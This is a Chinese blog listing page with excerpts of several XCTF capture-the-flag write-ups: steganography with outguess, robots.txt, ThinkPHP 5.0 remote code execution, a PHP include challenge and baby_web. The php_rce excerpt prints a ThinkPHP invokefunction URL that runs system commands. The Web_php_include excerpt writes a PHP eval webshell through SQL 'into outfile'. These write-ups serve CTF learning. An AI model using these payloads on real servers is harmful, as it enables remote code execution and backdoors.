![](https://img-blog.csdnimg.cn/20190927151043371.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
CTF
分享CTF比赛技术及实战
7号极客
修行中学习,提高维度,掌控人生。
展开
-
攻防世界MISC高手区Avatar
攻防世界MISC高手区五分题【Avatar】题目解题分析过程题目解题分析过程1、下载附件得一张图片(jpg)2、扔进winhex,分析无果;扔进Stegsolve,分析无果;binwalk分析,无果;foremost分离,无果。。。3、下载outguess工具,使用outguess分析猜出图片隐藏内容:使用命令:outguess -avatar.jpg avatar.txt,得到flag在avatar.txt里。得到flag:by hsc-浓眉...原创 2021-10-05 13:01:37 · 711 阅读 · 0 评论 -
攻防世界web高手区Training-WWW-Robots
Training-WWW-Robots根据题目提示,主要考察robots网络爬虫,在url后加上/robots.txt再访问。得到再把原来的url加上/fl0g.php,访问得到flagby hsc-浓眉原创 2021-10-05 12:54:18 · 69 阅读 · 0 评论 -
攻防世界web高手区php_rce
php_rce访问题目链接,发现网站使用框架为 ThinkPHP 5.0,结合题目提示,应该存在 ThinkPHP RCE漏 洞查找 flag:http://220.249.52.133:46433/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%222.cat fla原创 2021-10-05 12:53:57 · 1504 阅读 · 0 评论 -
攻防世界web高手区Web_php_include
Web_php_include1、通过御剑扫描后台发现登录后台,双击进去2、登录名:root密码为空进入后台,并编辑一句话木马执行select "<?php eval(@$_POST['ctf']); ?>"into outfile ‘/tmp/test.php’3、打开中国蚁剑输入url地址和密码,连接后打开改地址4、发现flag再www目录下的fl4gisisish3r3.php...原创 2021-10-05 12:53:17 · 82 阅读 · 0 评论 -
攻防世界高手区baby_web
web高手进阶区第一页1.baby_web1.baby_web方法1:使用火狐浏览器打开网址,发现只有hello world,根据题目提示初始页面想到了index.php,修改为index.php。按F5点击网络区域,看到消息头那就找到flag。方法2:使用 burp suite 抓包,访问。。。/index.php。send to repeater,按 go,看Response,找到flag。flag{very_baby_web}by hsc-浓眉...原创 2021-10-05 12:51:51 · 1356 阅读 · 0 评论